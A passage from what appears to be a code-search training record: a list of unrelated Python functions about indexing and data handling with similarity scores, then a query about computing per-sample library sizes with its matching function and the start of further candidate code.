ideal_order = False\n elif query_fields_covered < max_sort_seq:\n if field_name not in sort_fields:\n ideal_order = False\n elif query_fields_covered < max_range_seq:\n if field_name not in range_fields:\n ideal_order = False\n query_fields_covered += 1\n if query_fields_covered == query_field_count:\n coverage = 'full'\n\n # INDEX REPORT\n return OrderedDict({\n 'coverage': coverage,\n 'idealOrder': ideal_order,\n 'queryFieldsCovered': query_fields_covered,\n 'index': index,\n 'supported': supported\n })", "def index_stmt(self, idx):\n return Statement(\"index\", self, idx)", "def anno_gene_stats(anno_gene, loc_file, gene_file, isConvert):\r\n LocationNum = collections.Counter()\r\n LocationGene = collections.defaultdict(list)\r\n\r\n\r\n GeneCatSample = collections.defaultdict(lambda: collections.defaultdict(list))\r\n CatGeneSample = collections.defaultdict(lambda: collections.defaultdict(list))\r\n\r\n allLocations = set()\r\n anno_h = open(anno_gene, \"r\")\r\n for line in anno_h:\r\n lines = line.strip().split(\"\\t\")\r\n sample, location, number, gene = lines[:4]\r\n number = int(number)\r\n\r\n ### whether convert the category to \"Exon\" or \"Intron\"\r\n if isConvert == \"True\":\r\n if location == \"Intron\":\r\n newLoc = \"Intron\"\r\n else:\r\n newLoc = \"Exon\"\r\n elif isConvert == \"False\":\r\n newLoc = location\r\n else:\r\n print(\"Please check whether convert the original category to 'Intron' or 'Exon' based on True of False.\")\r\n sys.exit(1)\r\n\r\n allLocations.add(newLoc)\r\n ### get the dict of gene -> location -> sample\r\n genes = gene.split(\",\")\r\n for g in genes:\r\n GeneCatSample[g][newLoc].append(sample)\r\n\r\n ### get the location -> gene -> sample\r\n CatGeneSample[newLoc][g].append(sample)\r\n anno_h.close()\r\n\r\n\r\n ## output gene and number in samples\r\n ### sort all locations\r\n sortedAllLocation = sorted(list(allLocations))\r\n\r\n gene_h = open(gene_file, \"w\")\r\n\r\n headerSample = [l + \"_samples\" for l in sortedAllLocation]\r\n gene_h.write(\"Gene\\tTotal\\t%s\\t%s\\n\" % (\"\\t\".join(sortedAllLocation), \"\\t\".join(headerSample)))\r\n\r\n GeneRecord = {}\r\n GeneNumber = {}\r\n\r\n allGenes = sorted(list(GeneCatSample.keys()))\r\n for ge in allGenes:\r\n ### get the number and samples for each location of each gene\r\n GeneNum = []\r\n GeneSample = []\r\n\r\n for loc in sortedAllLocation:\r\n if loc in GeneCatSample[ge]:\r\n samples = GeneCatSample[ge][loc]\r\n ##############################\r\n ####### unique for samples\r\n samples = sorted(list(set(samples)))\r\n sampleNum = len(samples)\r\n else:\r\n sampleNum = 0\r\n samples = [\"-\"]\r\n\r\n GeneNum.append(sampleNum)\r\n GeneSample.append(samples)\r\n\r\n GeneNumSum = sum(GeneNum)\r\n CatNumOut = \"\\t\".join([str(g) for g in GeneNum])\r\n CatSampleOut = \"\\t\".join([\",\".join(s) for s in GeneSample])\r\n\r\n record = \"%s\\t%d\\t%s\\t%s\\t\" % (ge, GeneNumSum, CatNumOut, CatSampleOut)\r\n GeneNumber[ge] = GeneNumSum\r\n GeneRecord[ge] = record\r\n \r\n ### output\r\n GeneNumSorted = sort_dict_value(GeneNumber)\r\n for g, n in GeneNumSorted:\r\n r = GeneRecord[g]\r\n gene_h.write(\"%s\\n\" % r)\r\n\r\n gene_h.close() \r\n\r\n\r\n ### location and genes\r\n loc_h = open(loc_file, \"w\")\r\n loc_h.write(\"Location\\tGeneNumber\\tGenes\\tSampleNumber\\tSamples\\n\")\r\n for loc in sortedAllLocation:\r\n geneSample = CatGeneSample[loc]\r\n genes = sorted(list(geneSample.keys()))\r\n geneNum = len(genes)\r\n samNum = 0\r\n samList = []\r\n for ge in geneSample:\r\n sam = geneSample[ge]\r\n samList.append(sam)\r\n samNum += len(sam)\r\n samOut = \";\".join([\",\".join(s) for s in samList])\r\n loc_h.write(\"%s\\t%d\\t%s\\t%d\\t%s\\n\" % (loc, geneNum, \",\".join(genes), samNum, samOut))\r\n loc_h.close()", "def from_index(cls, index):\n return cls(name=index.name or None,\n fields=index.fields)", "def _compute_commonindex(self, index):\n # Shorten the computations with direct access to raw object\n hist = self._hist\n\n # Support dict access\n if hasattr(index, \"items\"):\n indexes = [slice(None)] * hist.rank()\n for k, v in index.items():\n indexes[k] = v\n\n # Normalize -> h[i] == h[i,]\n else:\n if not isinstance(index, tuple):\n index = (index,)\n # Now a list\n indexes = _expand_ellipsis(index, hist.rank())\n\n if len(indexes) != hist.rank():\n raise IndexError(\"Wrong number of indices for histogram\")\n\n # Allow [bh.loc(...)] to work\n for i in range(len(indexes)):\n # Support sum and rebin directly\n if indexes[i] is sum or hasattr(indexes[i], \"factor\"):\n indexes[i] = slice(None, None, indexes[i])\n # General locators\n elif callable(indexes[i]):\n indexes[i] = indexes[i](self.axes[i])\n elif hasattr(indexes[i], \"__index__\"):\n if abs(indexes[i]) >= hist.axis(i).size:\n raise IndexError(\"histogram index is out of range\")\n indexes[i] %= hist.axis(i).size\n\n return indexes", "def _index_group_with_subgroup(self, **kwargs):\n\n log.setLevel(self.log_level)\n # get a list of all the uri to index\n uri_list = kwargs.get('uri_list', self.get_uri_list())\n if not uri_list:\n log.info(\"0 items to index\")\n return\n # results = results[:100]\n # Start processing through uri\n batch_file = os.path.join(CFG.dirs.logs, \"batch_list.txt\")\n # with open(batch_file, \"w\") as fo:\n # fo.write(\"{\")\n log.info(\"'%s' items to index\", len(uri_list))\n self.time_start = datetime.datetime.now()\n batch_size = kwargs.get(\"batch_size\", 12000)\n if len(uri_list) > batch_size:\n batch_end = batch_size\n else:\n batch_end = len(uri_list)\n batch_start = 0\n batch_num = 1\n self.batch_data = {}\n self.batch_data[batch_num] = {}\n self.batch_data[batch_num]['main'] = []\n self.batch_uris = {}\n self.batch_uris[batch_num] = []\n for name, indexer in self.other_indexers.items():\n self.batch_data[batch_num][name] = []\n end = False\n last = False\n final_list = []\n expand_index = kwargs.get(\"expand_index\", True)\n while not end:\n log.debug(\"batch %s: %s-%s\", batch_num, batch_start, batch_end)\n sub_batch = []\n j = 0\n for i in range(batch_start, batch_end):\n # for i, subj in enumerate(uri_list[batch_start:batch_end]):\n qry_size = kwargs.get(\"qry_size\", 1000)\n if j < qry_size:\n try:\n sub_batch.append(uri_list.pop()) #subj)\n except IndexError:\n pass\n if j == qry_size -1 or i == batch_end - 1:\n try:\n sub_batch.append(uri_list.pop()) #subj)\n except IndexError:\n pass\n # with open(batch_file, \"a\") as fo:\n # fo.write(json.dumps({str('%s-%s' % (batch_num, i+1)):\n # [item[0].sparql\n # for item in sub_batch]})[1:-1]+\",\\n\")\n if not kwargs.get(\"no_threading\", False):\n th = threading.Thread(name=batch_start + i + 1,\n target=self._index_sub,\n args=(sub_batch,\n i+1,\n batch_num,))\n th.start()\n else:\n self._index_sub(sub_batch, i+1, batch_num)\n j = 0\n final_list += sub_batch\n sub_batch = []\n else:\n j += 1\n log.debug(datetime.datetime.now() - self.time_start)\n if not kwargs.get(\"no_threading\", False):\n main_thread = threading.main_thread()\n for t in threading.enumerate():\n if t is main_thread:\n continue\n t.join()\n action_list = []\n for key, items in self.batch_data[batch_num].items():\n if key == 'main':\n es_worker = self.es_worker\n else:\n es_worker = self.other_indexers[key]\n action_list += es_worker.make_action_list(items)\n result = self.es_worker.bulk_save(action_list)\n final_list += self.batch_uris[batch_num]\n self._update_triplestore(result, action_list)\n del action_list\n del self.batch_uris[batch_num]\n del self.batch_data[batch_num]\n try:\n del pyrdf.memorized\n pyrdf.memorized = {}\n except AttributeError:\n pass\n while gc.collect() > 0:\n pass\n # pdb.set_trace()\n batch_end += batch_size\n batch_start += batch_size\n if last:\n end = True\n if len(uri_list) <= batch_size:\n batch_end = len(uri_list)\n last = True\n batch_num += 1\n self.batch_uris[batch_num] = []\n self.batch_data[batch_num] = {}\n self.batch_data[batch_num]['main'] = []\n for name, indexer in self.other_indexers.items():\n self.batch_data[batch_num][name] = []\n log.debug(datetime.datetime.now() - self.time_start)\n # with open(batch_file, 'rb+') as fo:\n # fo.seek(-2, os.SEEK_END)\n # fo.truncate()\n # # fo.close()\n # fo.write(\"}\".encode())", "def get_indices(self):\n\n def query(rel): \n return \"\"\"SELECT pg_class.relname, pg_index.indkey\n FROM pg_class, pg_index\n WHERE (pg_index.indexrelid = pg_class.oid)\n AND (pg_index.indrelid = (SELECT pg_class.oid FROM pg_class WHERE pg_class.relname = \\'{}\\'));\n \"\"\".format(rel)\n\n rels = tpch.schema.keys()\n idxs = dict.fromkeys(rels)\n\n with self.tpch_cxn.cursor() as curs:\n for rel in rels:\n curs.execute(query(rel))\n idxs_ = curs.fetchall()\n idxs_ = dict(idxs_) # index -> index keys \n \n # TODO this can be done cleanly in query\n # pg_index.indkey is a SQL array of attributes indices in their respective tables\n split=lambda attrs: attrs.split() \n cast=lambda attrs: list(map(lambda attr: int(attr)-1, attrs))\n invertindex=lambda attrs: list(np.array(schema[rel])[attrs])\n\n attrs = idxs_.values() \n attrs = list(map(split, attrs))\n attrs = list(map(cast, attrs))\n attrs = list(map(invertindex, attrs))\n\n idxs_ = {key : attrs[i] for i, key in enumerate(idxs_.keys())}\n idxs[rel] = idxs_\n return idxs", "def _index_build(self, index_def):\n for index_data in index_def['key']:\n if index_data[0] == '_id' and len(index_def['key']) == 1:\n return 'Default Index'\n else:\n if index_def.get('background') == True:\n return 'Background'\n else:\n return 'Foreground'", "def index(self):\n if hasattr(self, '_m_index'):\n return self._m_index if hasattr(self, '_m_index') else None\n\n self._m_index = (self.index_separate if self.is_index_separate else self.index_in_tag)\n return self._m_index if hasattr(self, '_m_index') else None", "def generate_template(index_name):\n\n document = _BuildResultsMetaDocument()\n index = Index(name=index_name)\n index.document(document)\n index.settings(refresh_interval=\"30s\", number_of_shards=\"1\", number_of_replicas=\"1\")\n index.aliases(**{index_name: {}})\n index_template = index.as_template(template_name=\"template_\" + index_name, pattern=\"%s-*\" % index_name)\n return index_template.to_dict()", "def _index(self):\n return es.index(CLUSTER_NAME, 'record', self.dict, id=self.uuid)", "def _make_index(self, fname, sents, words):\n for w in words:\n # word index for this file only\n findex = []\n\n for ixS, s in enumerate(sents):\n # iterate over each word in the sentencep\n for ixT, token in enumerate(s):\n # could use regex for substring matching instead\n if w == token.lower():\n findex.append((ixS, ixT))\n # keep track of word use frequency\n self._freq[w] += 1\n\n # grow the main index \n self._index[w][fname]= findex", "def __getitem__(self, index: int) -> AnnotatedData:\n # sample selection\n selected_sample = self.df.iloc[index]\n return self._make_return_tuple(selected_sample)", "def generate_index(self):\n begin_o, end_o, begin_a, end_a = 0, 0, 0, 0\n for obs_space, act_space in zip(self.env.observation_space, self.env.action_space):\n end_o = end_o + obs_space.shape[0]\n if isinstance(act_space, Box):\n end_a = act_space.shape[0]\n else:\n end_a = act_space.n\n range_o = (begin_o, end_o)\n range_a = (begin_a, end_a)\n self.observation_index.append(range_o)\n self.action_index.append(range_a)\n begin_o = end_o\n begin_a = end_a", "def add_type_index(self, sample):\n sample['item_type_index'] = types.get_index_of_type(sample['item_type'])", "def init_index(self, index_name):\n return Index(self, index_name)", "def getIndividual2ColIndex(cls, header, col_name2index, sampleStartingColumn=9):\n\t\tsys.stderr.write(\"Finding all individuals ...\")\n\t\tno_of_cols = len(header)\n\t\tindividual_name2col_index = {}\t#individual's column name -> an opened file handler to store genetic data\n\t\tcounter = 0\n\t\tfor i in xrange(sampleStartingColumn, no_of_cols):\n\t\t\tindividualName = header[i]\n\t\t\tcol_index = col_name2index.get(individualName)\n\t\t\tif not individualName:\t#ignore empty column\n\t\t\t\tcontinue\n\t\t\tif individualName[:-4]=='.bam':\n\t\t\t\tindividualCode = individualName[:-4]\t#get rid of .bam\n\t\t\telse:\n\t\t\t\tindividualCode = individualName\n\t\t\tindividual_name2col_index[individualCode] = col_index\n\t\t\tcounter += 1\n\t\tsys.stderr.write(\"%s individuals added. Done.\\n\"%(counter))\n\t\treturn individual_name2col_index", "def index(self):\n path = self.path.format('index')\n \n with open(path, 'r', newline='') as file:\n l = list(csv.reader(file))\n \n index = [v for _ in l for v in _]\n index = dict((v, i) for (i, v) in enumerate(index))\n \n return index", "def _initIndexes(self):\n class Record:\n \"\"\" a moron simple object for carrying the 'extra'-payload to index\n constructors\n \"\"\"\n def __init__(self, **kw):\n self.__dict__.update(kw)\n\n addIndex = self.addIndex\n addColumn = self.addColumn\n\n # Content indexes\n self._catalog.indexes.clear()\n for (index_name, index_type, extra) in self.enumerateIndexes():\n if extra is None:\n addIndex( index_name, index_type)\n else:\n if isinstance(extra, StringTypes):\n p = Record(indexed_attrs=extra)\n elif isinstance(extra, DictType):\n p = Record(**extra)\n else:\n p = Record()\n addIndex( index_name, index_type, extra=p )\n\n # Cached metadata\n self._catalog.names = ()\n self._catalog.schema.clear()\n for column_name in self.enumerateColumns():\n addColumn( column_name )", "def add_index(self, index):\n self.add_index_sig(IndexSignature.from_index(index))", "def add_index(self, index):\n self.add_index_sig(IndexSignature.from_index(index))", "def __generate_features_index__(self, feature_names, dictionaries):\n keys = []\n for name, dictionary in zip(feature_names, dictionaries):\n features = []\n for feature in dictionary.keys():\n if dictionary.get(feature) > self._cutoff:\n features.append((name, feature))\n self.feature_freq[name] += 1\n keys.extend(features)\n for i in range(len(keys)):\n self._features_index[keys[i]] = i\n self.features_list = tuple(keys)\n self._features_vector_length = len(keys)", "def _generate_sample_indices(random_state, n_samples):\n random_instance = check_random_state(random_state)\n sample_indices = random_instance.randint(0, n_samples, n_samples)\n\n return sample_indices", "def make_idx_data(docs, ncand=30, skip=False):\n X, y, indices, ent_ids = [], [], [], []\n i = 0\n for doc in docs:\n doc_idx = []\n gold_ids, skip_ids = [], [] \n for mentcand in doc:\n ment_idx = []\n flag = False\n tX, ty, tids = [], [], []\n for entcand in mentcand[1][:ncand]:\n tX.append(entcand[1])\n ty.append(entcand[0][1])\n if ty[-1] == 1: flag = True\n tids.append(entcand[0][0])\n ment_idx.append(i)\n i += 1\n if skip and not flag:\n i = len(y)\n continue\n else:\n X += tX\n y += ty\n ent_ids += tids\n if len(ment_idx) > 0: \n doc_idx.append(ment_idx)\n gold_ids.append(mentcand[0][-1])\n else: # must be a false negative\n skip_ids.append(mentcand[0][-1]) \n if len(doc_idx) > 0: \n # append skip_ids after gold_ids, in order to properly evaluate\n # note len(doc_idx) != len(gold_ids+skip_ids)\n indices.append((doc_idx, gold_ids+skip_ids))\n X = np.array(X, dtype='float32')\n y = np.array(y, dtype='int')\n return X, y, indices, ent_ids", "def from_index(cls, index):\n path, expressions, attrs = index.deconstruct()\n attrs.pop('name', None)\n attrs.pop('fields', None)\n\n return cls(attrs=attrs,\n expressions=deepcopy(expressions or None),\n fields=deepcopy(index.fields or None),\n name=index.name or None)", "def add_index(self, name, func):\n assert name not in self.indices\n info_name = 'index:%s:%s' % (self.info['name'], name)\n info = self.store._get_info(info_name, index_for=self.info['name'])\n index = Index(self, info, func)\n self.indices[name] = index\n if IndexKeyBuilder:\n self._index_keys = IndexKeyBuilder(self.indices.values()).build\n return index", "def __getitem__(self, idx):\n \n sample = {'num_atoms': self.num_atoms[idx],\\\n 'symbols': self.symbols[idx],\\\n 'charges': self.charges[idx],\\\n 'positions': self.positions[idx],\\\n 'data': self.data[int(np.floor(idx/2))]}\n\n return sample", "def build_index(self):\n self.create_index()\n logger.debug(f\"Building index with {self.n_trees} trees.\")\n\n for i in range(len(self.corpus_embeddings)):\n self.index.add_item(i, self.corpus_embeddings[i])\n self.index.build(self.n_trees)", "def get_out_idx():\n exacz = pd.read_csv(f'{home}/ref/exac/exac_zscore_mimssense+stopgain_gn_checked.txt', sep='\\t')\n exacz = exacz[['gn', 'conseq', 'exac_z', 'exac_zrank']]\n\n gdi = pd.read_csv(f'{home}/work/generisk/gdi/gdi_score_pnas_gn_checked.txt', sep=\"\\t\")\n gdi = gdi[['gn', 'gdi', 'gdi_phred_raw']]\n gdi['gdi_rank'] = 100 - round(gdi['gdi'].rank() / len(gdi.index) * 100, 2)\n\n rvis = pd.read_csv(f\"{home}/ref/rvis/rvis_lite.txt\", sep='\\t')\n\n out_idx = pd.merge(exacz, gdi, on='gn', how='outer')\n out_idx = pd.merge(out_idx, rvis, on='gn', how='outer')\n\n # merge with omim\n omim = pd.read_csv(f\"{home}/ref/omim/omim_dedup.tsv\", sep='\\t', usecols='gn,inher'.split(\",\"))\n out_idx = pd.merge(out_idx, omim, on='gn', how='left')\n out_idx['inher'] = out_idx['inher'].fillna('na')\n\n # 18090\n out_idx = out_idx.loc[out_idx.conseq == 'missense_variant'].drop('conseq', axis=1)\n\n out_idx.to_pickle(f'{home}/gr/final/out_idx.pk')\n\n return out_idx", "def createIndivitual(self) -> Dict[str, Any]:\n ind = {\n \"genome\": {\n key: numpy.random.randint(0, len(value), size=self.ref_count[key]) for (\n key, value) in self.grammar.items()\n },\n \"fitness\": None,\n \"fenotype\": None,\n }\n return ind", "def build(self):\n\t\tself.documents = self.get_items_to_index()\n\t\tself.build_index()", "def get_samples_index(options):\n sys.stderr.write(\"reading list of individuals from %s\\n\" % \n options.samples)\n \n f = open(options.samples)\n\n ind_dict = {}\n \n idx = 0\n for line in f:\n words = line.rstrip().split()\n\n # name = words[0].replace(\"NA\", \"\")\n name = words[0]\n\n if name in ind_dict:\n raise ValueError(\"sample identifier '%s' appears multiple \"\n \"times in file %s\" % (name, options.samples))\n \n ind_dict[name] = idx\n \n idx += 1\n\n return ind_dict", "def build_index_groups(train):\n nz_row, nz_col = train.nonzero()\n nz_train = list(zip(nz_row, nz_col))\n\n grouped_nz_train_byrow = group_by(nz_train, index=0)\n nz_row_colindices = [(g, np.array([v[1] for v in value]))\n for g, value in grouped_nz_train_byrow]\n\n grouped_nz_train_bycol = group_by(nz_train, index=1)\n nz_col_rowindices = [(g, np.array([v[0] for v in value]))\n for g, value in grouped_nz_train_bycol]\n return nz_train, nz_row_colindices, nz_col_rowindices", "def table_key(self, reindex_dict):\n reindexed_marks = []\n for m in self.component1.marks:\n new_m = reindex_dict.get(m)\n if new_m == None:\n if len(reindex_dict) == 0:\n new_m = 0\n else:\n new_m = max(reindex_dict.values())+1\n reindex_dict[m] = new_m\n reindexed_marks.append(new_m)\n return tuple( [self.component1.genus] + sorted(reindexed_marks) )", "def _get_indices_from_payload(self):\n for _, value in self.s_namespaces.items():\n for index in value['indexes'].items():\n yield index", "def _get_table_from_samples(self, index):\n df = pd.DataFrame()\n for sample in self.samples:\n sd = sample.to_dict()\n ser = pd.Series(\n {k: v for (k, v) in list(sd.items()) if not k.startswith(\"_\")}\n )\n df = df.append(ser, ignore_index=True)\n index = [index] if isinstance(index, str) else index\n if not all([i in df.columns for i in index]):\n _LOGGER.debug(\n \"Could not set {} index. At least one of the \"\n \"requested columns does not exist: {}\".\n format(CFG_SAMPLE_TABLE_KEY, index))\n return df\n _LOGGER.debug(\"Setting sample_table index to: {}\".format(index))\n df.set_index(keys=index, drop=False, inplace=True)\n return df", "def indices(\n index_group: Literal[\"all\"] | str | IndexGroup | Sequence[str],\n ignore_error: bool = False,\n **kwargs,\n) -> Dataset:\n indices = _get_indices_of_group(index_group)\n out = None\n if \"out_file\" in kwargs.keys():\n out = kwargs[\"out_file\"]\n del kwargs[\"out_file\"]\n acc = []\n for i in indices:\n log.info(f\"Computing index '{i.short_name}'\")\n kwargs[\"index_name\"] = i.short_name\n if ignore_error:\n try:\n res = index(**kwargs)\n if \"percentiles\" in res.coords:\n res = res.rename({\"percentiles\": i.short_name + \"_percentiles\"})\n if \"thresholds\" in res.coords:\n res = res.rename({\"thresholds\": i.short_name + \"_thresholds\"})\n acc.append(res)\n except Exception:\n warn(f\"Could not compute {i.short_name}.\")\n else:\n res = index(**kwargs)\n if \"percentiles\" in res.coords:\n res = res.rename({\"percentiles\": i.short_name + \"_percentiles\"})\n if \"thresholds\" in res.coords:\n res = res.rename({\"thresholds\": i.short_name + \"_thresholds\"})\n acc.append(res)\n ds: Dataset = xr.merge(acc)\n if out is not None:\n _write_output_file(\n result_ds=ds,\n input_time_encoding=ds.time.encoding,\n netcdf_version=kwargs.get(\"netcdf_version\", NetcdfVersionRegistry.NETCDF4),\n file_path=out,\n )\n return ds", "def id_to_index(self, id):\n raise NotImplementedError", "def _generate_bagging_indices(random_state, bootstrap_features,\n bootstrap_samples, n_features, n_samples,\n max_features, max_samples):\n # Get valid random state\n random_state = check_random_state(random_state)\n\n # Draw indices\n feature_indices = _generate_indices(random_state, bootstrap_features,\n n_features, max_features)\n sample_indices = _generate_indices(random_state, bootstrap_samples,\n n_samples, max_samples)\n\n return feature_indices, sample_indices", "def __init__(self, index=None):\n self.index = index or {}", "def createIndex(self):\n\n super(COCO_PLUS, self).createIndex()\n catNameToId = dict()\n pointclouds = dict()\n imgToPc = dict()\n\n if 'pointclouds' in self.dataset:\n for pc in self.dataset['pointclouds']:\n imgToPc[pc['img_id']] = pc\n pointclouds[pc['id']] = pc\n\n if 'categories' in self.dataset:\n for cat in self.dataset['categories']:\n catNameToId[cat['name']] = cat['id']\n\n self.catNameToId = catNameToId\n self.pointclouds = pointclouds\n self.imgToPc = imgToPc\n self.logger.info('index created.')", "def get_transcript_gene_map(db_path, table=Annotation.__tablename__, index_col='TranscriptId'):\n df = read_attrs(db_path, table, index_col)\n return dict(list(zip(df.index, df.GeneId)))", "def index_id(i):\n return f\"(i={i})\"", "def build_index(self):\n\t\tix = self.create_index()\n\t\twriter = AsyncWriter(ix)\n\n\t\tfor i, document in enumerate(self.documents):\n\t\t\tif document:\n\t\t\t\twriter.add_document(**document)\n\t\t\tupdate_progress_bar(\"Building Index\", i, len(self.documents))\n\n\t\twriter.commit(optimize=True)", "def init_index(clear=False):\n return _run_indexer_func(\"init_index\", clear)", "def index(self):\n return dict(data='index')", "def _index_document(index_list):\n if isinstance(index_list, abc.Mapping):\n raise TypeError(\"passing a dict to sort/create_index/hint is not \"\n \"allowed - use a list of tuples instead. did you \"\n \"mean %r?\" % list(index_list.items()))\n elif not isinstance(index_list, (list, tuple)):\n raise TypeError(\"must use a list of (key, direction) pairs, \"\n \"not: \" + repr(index_list))\n if not len(index_list):\n raise ValueError(\"key_or_list must not be the empty list\")\n\n index = SON()\n for (key, value) in index_list:\n if not isinstance(key, str):\n raise TypeError(\"first item in each key pair must be a string\")\n if not isinstance(value, (str, int, abc.Mapping)):\n raise TypeError(\"second item in each key pair must be 1, -1, \"\n \"'2d', 'geoHaystack', or another valid MongoDB \"\n \"index specifier.\")\n index[key] = value\n return index", "def __getitem__(self, index: list) -> (np.array, np.array):\n # Generate indexes of the batch\n indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]\n\n # Find list of IDs\n list_IDs_temp = [self.list_IDs[k] for k in indexes]\n\n # Generate data\n X, M = self.__data_generation(list_IDs_temp)\n\n return X, M", "def to_flat_index(self) -> Index: # type: ignore[override]\n return Index(self._values, tupleize_cols=False)", "def __index_data_body(index, doc_type, doc_id, source):\n\n index_data = {\n \"_index\": index,\n \"_type\": doc_type,\n \"_id\": doc_id,\n \"_source\": source\n }\n\n return index_data", "def get_agg(self, x, ids):\n \n for i in range(batch_size):\n sample_size = (ids == i).sum()\n sample_agg = torch.mean(x[ids == i], 0).repeat(sample_size, 1)\n \n # concatenate each group of aggregated data\n if i == 0:\n agg = sample_agg \n else:\n agg = torch.cat((agg, sample_agg), dim=0)\n \n return agg", "def profile_index(func, args, kwargs, func_result):\n collection = args[0]\n\n report_kvs = _profile_query(collection)\n\n if len(args) > 1:\n report_kvs['Index'] = _to_json(args[1])\n\n return report_kvs", "def _make_index_list(self, used_sample_id_list, num_id_repeats=1):\n if used_sample_id_list is None:\n self.index_list = [i for i in range(self.data.shape[0])]\n\n else:\n self.index_list = [i for i in range(self.data.shape[0])\n if self.data[i][DATA_ID_INDEX] in used_sample_id_list\n ]\n\n if len(self.index_list) != len(used_sample_id_list):\n warnings.warn(\"Not all images found. \\\n Found: {}, requested: {}\".format(len(self.index_list),\n len(used_sample_id_list))\n )\n\n # for small datasets,\n # the ids can be repeated to get a reasonable batch size working\n self.index_list = self.index_list*num_id_repeats", "def indexRecords(self,indexTypes):\n indexed = self.indexed = {}\n for type in indexTypes:\n indexed[type] = {}\n for record in self.records:\n type = record.name\n if type in indexTypes:\n indexed[type][record.getId().lower()] = record", "def master_ndindex(self): # itermaster_indices(self):\n return itertools_product(\n *[range(*r) for r in self.location]\n ) # TODO check", "def compute_idx(pos, edge_index):\n\n pos_i = pos[edge_index[0]]\n pos_j = pos[edge_index[1]]\n\n d_ij = torch.norm(abs(pos_j - pos_i), dim=-1, keepdim=False).unsqueeze(-1) + 1e-5\n v_ji = (pos_i - pos_j) / d_ij\n\n unique, counts = torch.unique(\n edge_index[0], sorted=True, return_counts=True\n ) # Get central values\n full_index = (\n torch.arange(0, edge_index[0].size()[0]).cuda().int()\n ) # init full index\n\n # Compute 1\n repeat = torch.repeat_interleave(counts, counts)\n counts_repeat1 = torch.repeat_interleave(full_index, repeat) # 0,...,0,1,...,1,...\n\n # Compute 2\n split = torch.split(full_index, counts.tolist()) # split full index\n index2 = list(edge_index[0].data.cpu().numpy()) # get repeat index\n counts_repeat2 = torch.cat(itemgetter(*index2)(split), dim=0) # 0,1,2,...,0,1,2,..\n\n # Compute angle embeddings\n v1 = v_ji[counts_repeat1.long()]\n v2 = v_ji[counts_repeat2.long()]\n\n angle = (v1 * v2).sum(-1).unsqueeze(-1)\n angle = torch.clamp(angle, min=-1.0, max=1.0) + 1e-6 + 1.0\n\n return counts_repeat1.long(), counts_repeat2.long(), angle", "def _create_img_id_to_idx(self):\n with h5py.File(self.image_features_path, 'r') as features_file:\n coco_ids = features_file['ids'][()]\n coco_id_to_index = {id: i for i, id in enumerate(coco_ids)}\n return coco_id_to_index", "def index(self, *index):\n # .index() resets\n s = self._clone()\n if not index:\n s._index = None\n else:\n s._index = (self._index or []) + list(index)\n return s", "def insert_index(self):\n pass" ]
[ "0.6321686", "0.6155408", "0.60595196", "0.6051188", "0.59505635", "0.5836034", "0.5680135", "0.56531954", "0.5625771", "0.55557144", "0.5533098", "0.5517968", "0.5480308", "0.54524577", "0.54428107", "0.5442492", "0.5433063", "0.543244", "0.54272753", "0.54136074", "0.5409224", "0.54080087", "0.5389681", "0.53872", "0.53553134", "0.5351346", "0.53475285", "0.53452975", "0.53425384", "0.5337408", "0.53231746", "0.5289884", "0.528622", "0.5283764", "0.52781904", "0.5266295", "0.52521867", "0.5240203", "0.52371854", "0.5233222", "0.5229196", "0.52276045", "0.5221925", "0.5198369", "0.5185744", "0.5179887", "0.5172686", "0.5163934", "0.5146914", "0.5144823", "0.5138248", "0.51120514", "0.5111487", "0.51065975", "0.51033133", "0.5099613", "0.50958437", "0.50933844", "0.509236", "0.50913835", "0.5090005", "0.5090005", "0.50835896", "0.5077599", "0.5077438", "0.50699127", "0.5066628", "0.50626117", "0.5047522", "0.50473917", "0.5043177", "0.5040927", "0.50362474", "0.50281453", "0.5020047", "0.50041395", "0.50005203", "0.4983874", "0.4970982", "0.49657524", "0.4961032", "0.49557218", "0.49443734", "0.49402243", "0.4939011", "0.49384806", "0.49368602", "0.49319717", "0.4931955", "0.4926997", "0.49070683", "0.49037737", "0.48971233", "0.48963112", "0.4895887", "0.48926276", "0.48782703", "0.4874228", "0.4861559", "0.48573104" ]
0.64187765
0
create library_size text file. Calculate the 75% expression and sum of expression for each sample and write into output_fp.
def create_libsize(expr_distr_fp, output_fp, sample, debug=False): sample_expr_distr = pa.parquet.read_table(expr_distr_fp['path']).to_pandas() libsize_count= pd.DataFrame({'sample': sample_expr_distr.columns[1:], 'libsize_75percent': np.percentile(sample_expr_distr.iloc[:, 1:], 75, axis=0), 'libsize_total_count': np.sum(sample_expr_distr.iloc[:, 1:], axis=0)}, index = None) df_libsize = pd.DataFrame(libsize_count) if os.path.isfile(output_fp): previous_libsize = pd.read_csv(output_fp, sep = '\t') df_libsize = pd.concat([previous_libsize, df_libsize], axis=0).drop_duplicates(subset=['sample'], keep='last') df_libsize.to_csv(output_fp, sep='\t', index=False)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_libfile():\n # wfc3_obsmodes_uvis\n wfc3_uvis = [\n \"f218w\",\n \"f225w\",\n \"f275w\",\n \"f336w\",\n \"f390m\",\n \"f390w\",\n \"f410m\",\n \"f438w\",\n \"f467m\",\n \"f475w\",\n \"f547m\",\n \"f555w\",\n \"f606w\",\n \"f621m\",\n \"f625w\",\n \"f689m\",\n \"f763m\",\n \"f775w\",\n \"f814w\",\n \"f845m\",\n ]\n\n wfc3_ir = [\n \"f098m\",\n \"f105w\",\n \"f110w\",\n \"f125w\",\n \"f127m\",\n \"f139m\",\n \"f140w\",\n \"f153m\",\n \"f160w\",\n ]\n\n wfpc2 = [\n \"f122m\",\n \"f157w\",\n \"f336w\",\n \"f410m\",\n \"f467m\",\n \"f547m\",\n \"f439w\",\n \"f569w\",\n \"f675w\",\n \"f791w\",\n \"f170w\",\n \"f185w\",\n \"f218w\",\n \"f255w\",\n \"f300w\",\n \"f380w\",\n \"f555w\",\n \"f622w\",\n \"f450w\",\n \"f606w\",\n \"f702w\",\n \"f814w\",\n ]\n\n acs_wfc = [\n \"f435w\",\n \"f475w\",\n \"f550m\",\n \"f555w\",\n \"f606w\",\n \"f625w\",\n \"f775w\",\n \"f814w\",\n ]\n # galex\n galex = [\"fuv\", \"nuv\"]\n\n # Open hd5 file for writing\n hf = h5py.File(__ROOT__ + \"filters.hd5\", \"w\")\n\n # Create group for nice hierarchical structure\n f = hf.create_group(\"filters\")\n\n # Define arrays for \"contents\" / descriptive information\n tablenames = []\n observatories = []\n instruments = []\n names = []\n norms = []\n cwaves = []\n pwaves = []\n comments = []\n\n # Loop through WFC3_UVIS filters\n for filt in wfc3_uvis:\n\n # 